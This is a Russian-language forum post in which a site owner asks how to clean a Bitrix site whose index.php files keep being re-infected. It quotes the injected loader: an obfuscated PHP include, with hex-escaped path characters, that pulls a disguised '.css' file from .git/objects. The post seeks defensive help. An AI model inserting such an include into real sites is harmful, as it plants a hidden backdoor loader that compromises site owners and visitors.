Вирус на сайте Bitrix плодит или добавляет строки в index.php по всем директориям. Как избавиться?
Пример кода, который добавляет вирус в файл index.php:
/*bc657*/
$r8 = "/ho\x6de3/login/public_ht\x6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61);
/*bc657*/

При наличии данного кода в используемых файлах возникают ошибки и страница не открывается. В самом коде видно что прописывается путь к файлу, который является вредоносным. После его удаления файл создаётся в другой папке .git/objects/
Ранее вирус также во многих директориях создал .htaccess. Я удалил их все. Сейчас только основной. Сканил сайт айболитом, удалял вредоносные файлы. Опять появляются.
Также помимо этого приходит куча запросов к папкам и файлам Wordpress, хотя сайт на Битриксе. Таких запросов бывает до 1000 за буквально 5 минут. Если блокирую один IP, начинают приходить с другого.
Сама подмена происходит раз в сутки, обычно ночью, в разное время.

Тут про ВП, но для большинство актуально и для битрикса (с поправками на движок)
